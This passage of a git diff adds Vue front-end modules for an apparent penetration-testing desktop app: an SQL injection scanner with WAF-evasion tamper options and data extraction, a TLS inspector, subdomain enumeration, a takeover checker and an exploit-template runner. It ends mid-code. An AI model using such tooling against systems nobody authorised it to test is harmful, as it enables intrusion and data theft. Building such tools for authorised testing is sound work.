+  log.info(`techniques: ${techniques.join(",")} | level=${level.value} risk=${risk.value} tamper=${tamper.join(",") || "none"}`);
+
+  unlistens.push(await listen<string>("sqli:status", (e) => log.dim(String(e.payload))));
+  unlistens.push(await listen<Finding>("sqli:hit", (e) => {
+    const f = e.payload;
+    findings.value.push(f);
+    const dbms = f.dbms ? ` [DBMS:${f.dbms}]` : "";
+    log.hit(`[${f.confidence}] ${f.technique}  ${f.location}:${f.param}${dbms}`);
+    log.hit(`  payload:  ${f.full_payload}`);
+    log.hit(`  evidence: ${f.evidence}`);
+    for (const [k, v] of Object.entries(f.extracted)) {
+      log.valid(`  ${k} = ${v}`);
+    }
+  }));
+
+  try {
+    await invoke("sqli_scan", {
+      req: {
+        url: url.value,
+        method: method.value,
+        body: body.value || null,
+        headers: parseHeaders(),
+        cookies: cookies.value || null,
+        params: params.length ? params : null,
+        techniques,
+        level: level.value,
+        risk: risk.value,
+        stop_on_first: stopOnFirst.value,
+        auto_extract: autoExtract.value,
+        tamper,
+        concurrency: concurrency.value,
+        timeout_ms: timeoutMs.value,
+        follow_redirects: followRedirects.value,
+      },
+    });
+    log.ok(`scan done: ${findings.value.length} injection point(s)`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally {
+    running.value = false;
+    cleanup();
+  }
+}
+
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <div class="row">
+        <select v-model="method" class="method-sel">
+          <option>GET</option>
+          <option>POST</option>
+          <option>PUT</option>
+          <option>PATCH</option>
+        </select>
+        <input v-model="url" class="url-input" placeholder="https://target.com/item?id=1  (use * to mark injection point)" spellcheck="false" />
+      </div>
+
+      <details class="adv" open>
+        <summary>request · body · cookies · headers</summary>
+        <label class="ta">
+          <span class="lbl">body (POST/PUT) · <code>*</code> marks injection point</span>
+          <textarea class="term-input" v-model="body" rows="2" spellcheck="false" placeholder="user=admin&id=1*" />
+        </label>
+        <label class="ta">
+          <span class="lbl">cookies · <code>*</code> marks injection point</span>
+          <input class="inp" v-model="cookies" placeholder='sess=abc123; tracking=xxx*' />
+        </label>
+        <label class="ta">
+          <span class="lbl">headers · <code>*</code> on value to inject there</span>
+          <textarea class="term-input" v-model="headersRaw" rows="2" spellcheck="false" placeholder="Referer: https://x.com&#10;X-Forwarded-For: 1.2.3.4*" />
+        </label>
+        <Prompt label="params filter" v-model="paramsFilter" placeholder="id,cat (blank = test all)" />
+      </details>
+
+      <details class="adv">
+        <summary>techniques</summary>
+        <div class="row">
+          <label class="toggle"><input type="checkbox" v-model="tHeuristic" /><span>heuristic</span></label>
+          <label class="toggle"><input type="checkbox" v-model="tError" /><span>error</span></label>
+          <label class="toggle"><input type="checkbox" v-model="tBoolean" /><span>bool-blind</span></label>
+          <label class="toggle"><input type="checkbox" v-model="tUnion" /><span>union</span></label>
+          <label class="toggle"><input type="checkbox" v-model="tTime" /><span>time-blind</span></label>
+        </div>
+      </details>
+
+      <details class="adv">
+        <summary>tuning · level / risk / tamper</summary>
+        <div class="row">
+          <label class="mini"><span>level</span><input v-model.number="level" type="number" min="1" max="3" /></label>
+          <label class="mini"><span>risk</span><input v-model.number="risk" type="number" min="1" max="3" /></label>
+          <label class="toggle"><input type="checkbox" v-model="stopOnFirst" /><span>stop first</span></label>
+          <label class="toggle"><input type="checkbox" v-model="autoExtract" /><span>extract</span></label>
+          <label class="toggle"><input type="checkbox" v-model="followRedirects" /><span>follow</span></label>
+        </div>
+        <div class="row">
+          <span class="waf-label">tamper/WAF</span>
+          <label class="toggle"><input type="checkbox" v-model="tamperRandomcase" /><span>randomcase</span></label>
+          <label class="toggle"><input type="checkbox" v-model="tamperSpace2comment" /><span>space→/**/</span></label>
+          <label class="toggle"><input type="checkbox" v-model="tamperEqualToLike" /><span>=→LIKE</span></label>
+        </div>
+      </details>
+
+      <div class="row">
+        <label class="mini"><span>conc</span><input v-model.number="concurrency" type="number" min="1" max="20" /></label>
+        <label class="mini"><span>t/out</span><input v-model.number="timeoutMs" type="number" min="2000" max="60000" /></label>
+      </div>
+
+      <div class="row">
+        <button class="exec" :disabled="running" @click="run">{{ running ? "[ injecting... ]" : "> inject" }}</button>
+      </div>
+    </div>
+
+    <div v-if="findings.length" class="findings">
+      <div v-for="(f, i) in findings" :key="i" class="finding" :class="`conf-${f.confidence.toLowerCase()}`">
+        <div class="f-head">
+          <span class="f-tech">{{ f.technique }}</span>
+          <span class="f-loc">{{ f.location }} / <b>{{ f.param }}</b></span>
+          <span v-if="f.dbms" class="f-dbms">{{ f.dbms }}</span>
+          <span class="sev" :class="`sev-${f.confidence.toLowerCase()}`">{{ f.confidence }}</span>
+        </div>
+        <div class="f-payload">
+          <span class="f-prefix" v-if="f.prefix">prefix <code>{{ f.prefix }}</code></span>
+          <span class="f-suffix" v-if="f.suffix">suffix <code>{{ f.suffix }}</code></span>
+        </div>
+        <pre class="f-full">{{ f.full_payload }}</pre>
+        <div class="f-evidence">» {{ f.evidence }}</div>
+        <div v-if="Object.keys(f.extracted).length" class="f-extracted">
+          <div v-for="(v, k) in f.extracted" :key="k" class="kv">
+            <span class="k">{{ k }}:</span> <span class="v">{{ v }}</span>
+          </div>
+        </div>
+      </div>
+    </div>
+
+    <Terminal :lines="log.lines.value" title="sqli // sqlmap-style detection" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.adv { border: 1px solid var(--border); background: var(--bg-panel); padding: 4px 8px; }
+.adv summary { cursor: pointer; font-size: 10px; color: var(--fg-dim); text-transform: uppercase; letter-spacing: 0.1em; padding: 2px 0; }
+.adv summary:hover { color: var(--fg); }
+.adv > *:not(summary) { margin-top: 6px; }
+
+.method-sel {
+  background: var(--bg-panel);
+  border: 1px solid var(--alert);
+  color: var(--alert);
+  padding: 4px 8px;
+  font-weight: 700;
+  font-size: 12px;
+  font-family: inherit;
+  flex-shrink: 0;
+}
+.method-sel option { background: var(--bg); color: var(--fg); }
+.url-input {
+  flex: 1;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  color: var(--fg);
+  padding: 4px 8px;
+  font-size: 12px;
+  min-width: 0;
+}
+.url-input:focus { border-color: var(--accent); outline: none; }
+
+.inp {
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  color: var(--fg);
+  padding: 4px 8px;
+  font-size: 12px;
+  font-family: inherit;
+  width: 100%;
+}
+.inp:focus { border-color: var(--info); outline: none; }
+
+code {
+  color: var(--info);
+  background: var(--bg);
+  padding: 0 4px;
+  border: 1px solid var(--border);
+  font-size: 10px;
+}
+.waf-label {
+  color: var(--warn);
+  font-size: 10px;
+  text-transform: uppercase;
+  letter-spacing: 0.15em;
+  align-self: center;
+  padding-right: 4px;
+}
+
+.findings { display: flex; flex-direction: column; gap: 6px; max-height: 300px; overflow-y: auto; }
+.finding {
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  padding: 6px 8px;
+  display: flex;
+  flex-direction: column;
+  gap: 3px;
+}
+.finding.conf-high { border-left: 3px solid var(--alert); }
+.finding.conf-medium { border-left: 3px solid var(--warn); }
+.finding.conf-low { border-left: 3px solid var(--fg-dim); }
+.f-head { display: flex; gap: 6px; align-items: center; flex-wrap: wrap; font-size: 11px; }
+.f-tech {
+  font-weight: 700;
+  color: var(--alert);
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  font-size: 10px;
+}
+.f-loc { color: var(--info); font-size: 11px; }
+.f-loc b { color: var(--fg); }
+.f-dbms { color: var(--valid); font-size: 10px; border: 1px solid var(--valid); padding: 0 5px; }
+.f-payload { display: flex; gap: 8px; font-size: 10px; color: var(--fg-dim); flex-wrap: wrap; }
+.f-full {
+  background: var(--bg);
+  border: 1px solid var(--border);
+  padding: 4px 6px;
+  font-size: 11px;
+  color: var(--valid);
+  white-space: pre-wrap;
+  word-break: break-all;
+  font-family: var(--mono);
+  margin: 0;
+}
+.f-evidence { color: var(--fg-dim); font-size: 10px; font-style: italic; }
+.f-extracted {
+  display: grid;
+  grid-template-columns: repeat(auto-fill, minmax(160px, 1fr));
+  gap: 3px;
+  margin-top: 3px;
+}
+.kv {
+  background: var(--bg);
+  border: 1px solid var(--border);
+  padding: 2px 6px;
+  font-size: 10px;
+}
+.kv .k { color: var(--fg-dim); text-transform: uppercase; letter-spacing: 0.1em; font-size: 9px; }
+.kv .v { color: var(--valid); font-weight: 700; }
+</style>
diff --git a/src/components/modules/SslScan.vue b/src/components/modules/SslScan.vue
new file mode 100644
index 0000000..609f14c
--- /dev/null
+++ b/src/components/modules/SslScan.vue
@@ -0,0 +1,145 @@
+<script setup lang="ts">
+import { ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import Prompt from "../Prompt.vue";
+import Terminal from "../Terminal.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+interface Cert {
+  subject: string;
+  issuer: string;
+  serial: string;
+  not_before: string;
+  not_after: string;
+  days_remaining: number;
+  sans: string[];
+  key_algo: string;
+  signature_algo: string;
+  sha256_fingerprint: string;
+  is_ca: boolean;
+  self_signed: boolean;
+  expired: boolean;
+}
+interface Report {
+  host: string;
+  port: number;
+  tls_version: string;
+  cipher_suite?: string;
+  sni_presented: string;
+  cert_chain: Cert[];
+  chain_valid: boolean;
+  issues: string[];
+  alpn?: string;
+}
+
+const host = ref("example.com");
+const port = ref(443);
+const timeoutMs = ref(8000);
+const running = ref(false);
+const report = ref<Report | null>(null);
+const log = useTerminal();
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  report.value = null;
+  log.clear();
+  try {
+    report.value = await invoke<Report>("ssl_scan", {
+      req: { host: host.value.trim(), port: port.value, timeout_ms: timeoutMs.value },
+    });
+    const r = report.value;
+    log.valid(`${r.tls_version}${r.cipher_suite ? " / " + r.cipher_suite : ""}${r.alpn ? " / ALPN: " + r.alpn : ""}`);
+    log.info(`chain: ${r.cert_chain.length} cert(s)`);
+    for (const iss of r.issues) log.warn(iss);
+  } catch (e: any) { log.err(String(e)); }
+  finally { running.value = false; }
+}
+
+function daysClass(d: number) {
+  if (d < 0) return "expired";
+  if (d < 14) return "warn";
+  return "ok";
+}
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <Prompt label="host" v-model="host" placeholder="example.com" />
+      <div class="row">
+        <label class="mini"><span>port</span><input v-model.number="port" type="number" min="1" max="65535" /></label>
+        <label class="mini"><span>t/out</span><input v-model.number="timeoutMs" type="number" min="1000" max="30000" /></label>
+        <button class="exec" :disabled="running" @click="run">{{ running ? "[ handshaking... ]" : "> inspect" }}</button>
+      </div>
+    </div>
+
+    <div v-if="report" class="report">
+      <div class="meta">
+        <span class="meta-k">TLS</span>
+        <span class="meta-v tls">{{ report.tls_version }}</span>
+        <span v-if="report.cipher_suite" class="meta-v">{{ report.cipher_suite }}</span>
+        <span v-if="report.alpn" class="meta-v alpn">ALPN: {{ report.alpn }}</span>
+      </div>
+
+      <div v-if="report.issues.length" class="issues">
+        <div class="issues-head">⚠ {{ report.issues.length }} issue(s)</div>
+        <div v-for="(i, idx) in report.issues" :key="idx" class="issue">» {{ i }}</div>
+      </div>
+
+      <div v-for="(c, i) in report.cert_chain" :key="i" class="cert">
+        <div class="cert-head">
+          <span class="cert-idx">[{{ i === 0 ? "LEAF" : i === report.cert_chain.length - 1 ? "ROOT" : `CHAIN ${i}` }}]</span>
+          <span class="cert-subj">{{ c.subject.slice(0, 80) }}</span>
+          <span v-if="c.expired" class="tag danger">EXPIRED</span>
+          <span v-else-if="c.days_remaining < 14" class="tag warn">{{ c.days_remaining }}d</span>
+          <span v-else class="tag ok">{{ c.days_remaining }}d</span>
+        </div>
+        <div class="cert-row"><span class="k">issuer</span><span>{{ c.issuer }}</span></div>
+        <div class="cert-row"><span class="k">valid</span><span>{{ c.not_before }} → {{ c.not_after }}</span></div>
+        <div class="cert-row"><span class="k">days</span><span :class="daysClass(c.days_remaining)">{{ c.days_remaining }}</span></div>
+        <div class="cert-row"><span class="k">key</span><span>{{ c.key_algo }}</span></div>
+        <div class="cert-row"><span class="k">sig</span><span>{{ c.signature_algo }}</span></div>
+        <div v-if="c.sans.length" class="cert-row sans-row">
+          <span class="k">SANs ×{{ c.sans.length }}</span>
+          <span class="sans">{{ c.sans.join(", ") }}</span>
+        </div>
+        <div class="cert-row"><span class="k">sha256</span><span class="fp">{{ c.sha256_fingerprint }}</span></div>
+      </div>
+    </div>
+
+    <Terminal :lines="log.lines.value" title="ssl // tls inspector" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.report { display: flex; flex-direction: column; gap: 6px; max-height: 440px; overflow-y: auto; }
+
+.meta { display: flex; gap: 6px; flex-wrap: wrap; padding: 6px 10px; background: var(--bg-panel); border: 1px solid var(--border); font-size: 11px; }
+.meta-k { color: var(--fg-dim); text-transform: uppercase; letter-spacing: 0.15em; font-size: 10px; }
+.meta-v { color: var(--fg); padding: 0 6px; border: 1px solid var(--border-hot); font-size: 10px; }
+.meta-v.tls { color: var(--valid); border-color: var(--valid); }
+.meta-v.alpn { color: var(--info); border-color: var(--info); }
+
+.issues { background: rgba(255, 47, 74, 0.05); border: 1px solid var(--alert); padding: 6px 10px; }
+.issues-head { color: var(--alert); font-size: 11px; font-weight: 700; text-transform: uppercase; letter-spacing: 0.1em; margin-bottom: 3px; }
+.issue { color: var(--alert); font-size: 11px; padding: 1px 0; }
+
+.cert { background: var(--bg-panel); border: 1px solid var(--border); padding: 6px 10px; }
+.cert-head { display: flex; gap: 6px; align-items: center; flex-wrap: wrap; padding-bottom: 4px; border-bottom: 1px solid var(--border); margin-bottom: 4px; }
+.cert-idx { color: var(--alert); font-size: 10px; font-weight: 700; letter-spacing: 0.15em; flex-shrink: 0; }
+.cert-subj { color: var(--fg); font-size: 11px; flex: 1; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; min-width: 0; }
+.tag { font-size: 9px; padding: 1px 5px; border: 1px solid; letter-spacing: 0.1em; flex-shrink: 0; }
+.tag.ok { color: var(--valid); border-color: var(--valid); }
+.tag.warn { color: var(--warn); border-color: var(--warn); }
+.tag.danger { color: var(--alert); border-color: var(--alert); }
+
+.cert-row { display: flex; gap: 8px; font-size: 10px; padding: 1px 0; }
+.cert-row .k { color: var(--fg-dim); text-transform: uppercase; letter-spacing: 0.1em; min-width: 60px; flex-shrink: 0; font-size: 9px; }
+.cert-row .k + span { color: var(--fg); word-break: break-all; }
+.cert-row .expired { color: var(--alert); }
+.cert-row .warn { color: var(--warn); }
+.cert-row .ok { color: var(--valid); }
+.sans { color: var(--info) !important; font-size: 10px; word-break: break-all; }
+.fp { color: var(--fg-dim) !important; font-size: 9px; word-break: break-all; }
+</style>
diff --git a/src/components/modules/SubEnum.vue b/src/components/modules/SubEnum.vue
new file mode 100644
index 0000000..e5889d3
--- /dev/null
+++ b/src/components/modules/SubEnum.vue
@@ -0,0 +1,244 @@
+<script setup lang="ts">
+import { onMounted, onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import Prompt from "../Prompt.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+interface SourceList { free: string[]; key_based: string[]; }
+interface SourceStat { source: string; count: number; error?: string | null; took_ms: number; }
+
+const domain = ref("example.com");
+const wordlist = ref("www,api,dev,staging,admin,mail,ftp,test,portal,app,beta,vpn,m,blog,shop");
+const concurrency = ref(50);
+const running = ref(false);
+const progress = ref({ done: 0, total: 0 });
+
+const sources = ref<SourceList>({ free: [], key_based: [] });
+const enabledSources = ref<Set<string>>(new Set());
+const apiKeys = ref<Record<string, string>>({});
+const sourceStats = ref<SourceStat[]>([]);
+
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+async function loadSources() {
+  try {
+    sources.value = await invoke<SourceList>("subdomain_sources");
+    // load saved keys + enabled state from localStorage
+    const savedKeys = JSON.parse(localStorage.getItem("subenum:keys") || "{}");
+    apiKeys.value = savedKeys;
+    const savedEnabled = JSON.parse(localStorage.getItem("subenum:enabled") || "null");
+    if (savedEnabled) {
+      enabledSources.value = new Set(savedEnabled);
+    } else {
+      enabledSources.value = new Set(sources.value.free);
+    }
+  } catch (e: any) { log.err(String(e)); }
+}
+
+function toggleSource(name: string) {
+  if (enabledSources.value.has(name)) enabledSources.value.delete(name);
+  else enabledSources.value.add(name);
+  enabledSources.value = new Set(enabledSources.value);
+  localStorage.setItem("subenum:enabled", JSON.stringify(Array.from(enabledSources.value)));
+}
+
+function saveKeys() {
+  localStorage.setItem("subenum:keys", JSON.stringify(apiKeys.value));
+  log.dim("api keys saved (local storage)");
+}
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  sourceStats.value = [];
+  log.clear();
+  progress.value = { done: 0, total: 0 };
+
+  const words = wordlist.value.split(/[,\n\s]+/).map((w) => w.trim()).filter(Boolean);
+  const enabled = Array.from(enabledSources.value);
+  log.info(`domain: ${domain.value}`);
+  log.info(`sources: ${enabled.join(",")} (${enabled.length}) | brute: ${words.length} words`);
+
+  unlistens.push(await listen<string>("subenum:status", (e) => log.dim(String(e.payload))));
+  unlistens.push(await listen<{ done: number; total: number }>("subenum:progress", (e) => { progress.value = e.payload; }));
+  unlistens.push(await listen<SourceStat>("subenum:source", (e) => {
+    const s = e.payload;
+    if (s.error) return;
+    sourceStats.value.push(s);
+    log.valid(`● ${s.source.padEnd(15)} +${String(s.count).padStart(4)}  ${s.took_ms}ms`);
+  }));
+  unlistens.push(await listen<any>("subenum:hit", (e) => {
+    const p = e.payload;
+    log.valid(`${p.host.padEnd(40)} → ${p.ips.join(",")} [${p.source}]`);
+  }));
+
+  try {
+    const hits: unknown[] = await invoke("subdomain_enum", {
+      req: {
+        domain: domain.value,
+        sources: enabled,
+        wordlist: words,
+        concurrency: concurrency.value,
+        api_keys: apiKeys.value,
+      },
+    });
+    log.ok(`enum complete: ${hits.length} live host(s)`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally {
+    running.value = false;
+    cleanup();
+  }
+}
+
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+
+onMounted(loadSources);
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <Prompt label="domain" v-model="domain" placeholder="example.com" />
+
+      <details class="adv">
+        <summary>sources · {{ enabledSources.size }} / {{ sources.free.length + sources.key_based.length }} enabled</summary>
+
+        <div class="src-section">
+          <div class="src-head">free <span class="src-sub">no api key required</span></div>
+          <div class="src-grid">
+            <label v-for="s in sources.free" :key="s" class="src-chip" :class="{ on: enabledSources.has(s) }">
+              <input type="checkbox" :checked="enabledSources.has(s)" @change="toggleSource(s)" />
+              <span>{{ s }}</span>
+            </label>
+          </div>
+        </div>
+
+        <div class="src-section">
+          <div class="src-head">key-based <span class="src-sub">paste API key to enable</span></div>
+          <div class="key-list">
+            <div v-for="s in sources.key_based" :key="s" class="key-row">
+              <label class="src-chip" :class="{ on: enabledSources.has(s) }">
+                <input type="checkbox" :checked="enabledSources.has(s)" @change="toggleSource(s)" />
+                <span>{{ s }}</span>
+              </label>
+              <input
+                v-model="apiKeys[s]"
+                class="key-input"
+                type="password"
+                :placeholder="`${s} api key`"
+                @blur="saveKeys"
+                spellcheck="false"
+              />
+            </div>
+          </div>
+        </div>
+      </details>
+
+      <details class="adv">
+        <summary>brute · dns wordlist</summary>
+        <textarea class="term-input" v-model="wordlist" rows="2" spellcheck="false" placeholder="www,api,dev..." />
+      </details>
+
+      <div class="row">
+        <label class="mini"><span>conc</span><input v-model.number="concurrency" type="number" min="1" max="500" /></label>
+        <button class="exec" :disabled="running" @click="run">{{ running ? "[ enumerating... ]" : "> enumerate" }}</button>
+      </div>
+
+      <div v-if="progress.total" class="bar">
+        <div class="bar-fill" :style="{ width: (progress.done / progress.total) * 100 + '%' }" />
+        <span class="bar-text">{{ progress.done }} / {{ progress.total }}</span>
+      </div>
+
+      <div v-if="sourceStats.length" class="stat-grid">
+        <div v-for="s in sourceStats" :key="s.source" class="stat">
+          <span class="st-src">{{ s.source }}</span>
+          <span class="st-cnt">+{{ s.count }}</span>
+          <span class="st-ms">{{ s.took_ms }}ms</span>
+        </div>
+      </div>
+    </div>
+
+    <Terminal :lines="log.lines.value" title="subdomain // multi-source enum" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.adv { border: 1px solid var(--border); background: var(--bg-panel); padding: 4px 8px; }
+.adv summary {
+  cursor: pointer;
+  font-size: 10px;
+  color: var(--fg-dim);
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  padding: 4px 0;
+}
+.adv summary:hover { color: var(--fg); }
+.adv > *:not(summary) { margin-top: 6px; }
+
+.src-section { margin-bottom: 8px; }
+.src-section:last-child { margin-bottom: 0; }
+.src-head {
+  font-size: 9px;
+  color: var(--alert);
+  text-transform: uppercase;
+  letter-spacing: 0.15em;
+  margin-bottom: 4px;
+}
+.src-sub { color: var(--fg-ghost); margin-left: 6px; }
+.src-grid { display: flex; gap: 4px; flex-wrap: wrap; }
+.src-chip {
+  display: flex;
+  align-items: center;
+  gap: 4px;
+  padding: 2px 8px;
+  border: 1px solid var(--border);
+  background: var(--bg);
+  color: var(--fg-dim);
+  font-size: 11px;
+  cursor: pointer;
+  transition: all 0.1s;
+}
+.src-chip input { display: none; }
+.src-chip.on { color: var(--alert); border-color: var(--alert); background: rgba(255, 47, 74, 0.05); }
+
+.key-list { display: flex; flex-direction: column; gap: 4px; }
+.key-row { display: flex; gap: 6px; align-items: center; }
+.key-row .src-chip { min-width: 100px; flex-shrink: 0; }
+.key-input {
+  flex: 1;
+  background: var(--bg);
+  border: 1px solid var(--border);
+  color: var(--fg);
+  padding: 3px 6px;
+  font-size: 11px;
+  font-family: inherit;
+  min-width: 0;
+}
+.key-input:focus { border-color: var(--info); outline: none; }
+
+.stat-grid {
+  display: grid;
+  grid-template-columns: repeat(auto-fill, minmax(140px, 1fr));
+  gap: 4px;
+}
+.stat {
+  display: flex;
+  gap: 6px;
+  align-items: center;
+  padding: 3px 6px;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  font-size: 10px;
+  border-left: 2px solid var(--accent);
+}
+.stat.err { border-left-color: var(--alert); }
+.st-src { flex: 1; color: var(--fg); text-overflow: ellipsis; overflow: hidden; white-space: nowrap; }
+.st-cnt { color: var(--accent); font-weight: 700; font-variant-numeric: tabular-nums; }
+.st-err { color: var(--alert); font-weight: 700; }
+.st-ms { color: var(--fg-ghost); font-variant-numeric: tabular-nums; }
+</style>
diff --git a/src/components/modules/Takeover.vue b/src/components/modules/Takeover.vue
new file mode 100644
index 0000000..22d336a
--- /dev/null
+++ b/src/components/modules/Takeover.vue
@@ -0,0 +1,67 @@
+<script setup lang="ts">
+import { onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+const hosts = ref("");
+const concurrency = ref(20);
+const timeoutMs = ref(5000);
+const running = ref(false);
+const progress = ref({ done: 0, total: 0 });
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  log.clear();
+  progress.value = { done: 0, total: 0 };
+
+  const list = hosts.value.split(/[\s,\n]+/).map((s) => s.trim()).filter(Boolean);
+  if (!list.length) { log.err("no hosts"); running.value = false; return; }
+  log.info(`checking ${list.length} host(s) against fingerprint DB`);
+
+  unlistens.push(await listen<{ done: number; total: number }>("takeover:progress", (e) => { progress.value = e.payload; }));
+  unlistens.push(await listen<any>("takeover:hit", (e) => {
+    const p = e.payload;
+    const tag = p.vulnerable ? "VULN" : "INFO";
+    const msg = `[${tag}/${p.confidence}] ${p.host} → ${p.cname ?? "?"} [${p.service ?? "?"}] :: ${p.evidence}`;
+    if (p.vulnerable) log.hit(msg); else log.valid(msg);
+  }));
+
+  try {
+    const res: any[] = await invoke("takeover_scan", {
+      req: { hosts: list, concurrency: concurrency.value, timeout_ms: timeoutMs.value },
+    });
+    const vulns = res.filter((r) => r.vulnerable).length;
+    log.ok(`done: ${res.length} fingerprinted, ${vulns} VULN`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally { running.value = false; cleanup(); }
+}
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <label class="ta">
+        <span class="lbl">targets // subdomains</span>
+        <textarea class="term-input" v-model="hosts" placeholder="stale.example.com&#10;old.subdomain.target.com" spellcheck="false" rows="5" />
+      </label>
+      <div class="row">
+        <label class="mini"><span>conc</span><input v-model.number="concurrency" type="number" min="1" max="200" /></label>
+        <label class="mini"><span>t/out</span><input v-model.number="timeoutMs" type="number" min="500" max="30000" /></label>
+        <button class="exec" :disabled="running" @click="run">{{ running ? "[ hunting... ]" : "> hunt-takeover" }}</button>
+      </div>
+      <div v-if="progress.total" class="bar">
+        <div class="bar-fill" :style="{ width: (progress.done / progress.total) * 100 + '%' }" />
+        <span class="bar-text">{{ progress.done }} / {{ progress.total }}</span>
+      </div>
+    </div>
+    <Terminal :lines="log.lines.value" title="takeover // fingerprint DB: S3/GH/Heroku/Azure/Vercel/+" @clear="log.clear()" />
+  </div>
+</template>
diff --git a/src/components/modules/Xploiter.vue b/src/components/modules/Xploiter.vue
new file mode 100644
index 0000000..25ec64b
--- /dev/null
+++ b/src/components/modules/Xploiter.vue
@@ -0,0 +1,426 @@
+<script setup lang="ts">
+import { computed, onMounted, onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+interface TemplateRef {
+  filename: string;
+  path: string;
+  id: string;
+  name: string;
+  severity: string;
+  tags: string[];
+  author: string;
+  description: string;
+  builtin: boolean;
+}
+
+type View = "list" | "editor";
+
+const view = ref<View>("list");
+
+const targets = ref("https://example.com");
+const templates = ref<TemplateRef[]>([]);
+const selected = ref<Set<string>>(new Set());
+
+const query = ref("");
+const tagFilter = ref("");
+const severities = ref({ critical: true, high: true, medium: true, low: true, info: true });
+
+const running = ref(false);
+const progress = ref({ done: 0, total: 0 });
+
+// editor state
+const editorPath = ref<string | null>(null);
+const editorFilename = ref("");
+const editorContent = ref("");
+const editorDirty = ref(false);
+
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+const selectedSeverities = computed(() =>
+  Object.entries(severities.value).filter(([, v]) => v).map(([k]) => k)
+);
+
+async function bootstrap() {
+  try {
+    const res: any = await invoke("xploit_store_init");
+    if (res.written > 0) log.dim(`extracted ${res.written} starter templates → ${res.path}`);
+  } catch (e: any) { log.err(String(e)); }
+  await reload();
+}
+
+async function reload() {
+  try {
+    templates.value = await invoke("xploit_store_list", {
+      severity: selectedSeverities.value,
+      tag: tagFilter.value || null,
+      query: query.value || null,
+    });
+  } catch (e: any) { log.err(String(e)); }
+}
+
+function toggle(path: string) {
+  if (selected.value.has(path)) selected.value.delete(path);
+  else selected.value.add(path);
+  selected.value = new Set(selected.value);
+}
+
+function toggleAll() {
+  if (selected.value.size === templates.value.length) selected.value = new Set();
+  else selected.value = new Set(templates.value.map((t) => t.path));
+}
+
+async function openEditor(t: TemplateRef | null) {
+  if (t) {
+    try {
+      editorContent.value = await invoke<string>("xploit_store_read", { path: t.path });
+      editorPath.value = t.path;
+      editorFilename.value = t.filename;
+    } catch (e: any) { log.err(String(e)); return; }
+  } else {
+    editorContent.value = await invoke<string>("xploit_store_starter_template");
+    editorPath.value = null;
+    editorFilename.value = `xpl-custom-${Date.now()}.yaml`;
+  }
+  editorDirty.value = false;
+  view.value = "editor";
+}
+
+async function save() {
+  try {
+    const newPath: string = await invoke("xploit_store_save", {
+      filename: editorFilename.value,
+      content: editorContent.value,
+    });
+    editorPath.value = newPath;
+    editorDirty.value = false;
+    log.ok(`saved → ${newPath}`);
+    await reload();
+  } catch (e: any) {
+    log.err(String(e));
+  }
+}
+
+async function remove(t: TemplateRef) {
+  if (t.builtin) {
+    log.warn(`${t.filename} is bundled — deleting will reappear on next init`);
+  }
+  try {
+    await invoke("xploit_store_delete", { path: t.path });
+    selected.value.delete(t.path);
+    selected.value = new Set(selected.value);
+    log.dim(`deleted ${t.filename}`);
+    await reload();
+  } catch (e: any) { log.err(String(e)); }
+}
+
+async function duplicate(t: TemplateRef) {
+  try {
+    const newPath: string = await invoke("xploit_store_duplicate", { path: t.path });
+    log.dim(`duplicated → ${newPath}`);
+    await reload();
+  } catch (e: any) { log.err(String(e)); }
+}
+
+async function run() {
+  if (running.value) return;
+  const tgts = targets.value.split(/[\s,\n]+/).map((s) => s.trim()).filter(Boolean);
+  if (!tgts.length) { log.err("no targets"); return; }
+  const paths = Array.from(selected.value);
+  if (!paths.length) { log.err("no templates selected"); return; }
+
+  running.value = true;
+  progress.value = { done: 0, total: 0 };
+  log.clear();
+  log.info(`loading ${paths.length} template(s) × ${tgts.length} target(s)`);
+
+  // read raw YAMLs
+  const yamls: string[] = [];
+  for (const p of paths) {
+    try { yamls.push(await invoke<string>("xploit_store_read", { path: p })); }
+    catch (e: any) { log.warn(`skip ${p}: ${e}`); }
+  }
+
+  unlistens.push(await listen<string>("xpl:status", (e) => log.dim(String(e.payload))));
+  unlistens.push(await listen<{ done: number; total: number }>("xpl:progress", (e) => { progress.value = e.payload; }));
+  unlistens.push(await listen<any>("xpl:hit", (e) => {
+    const f = e.payload;
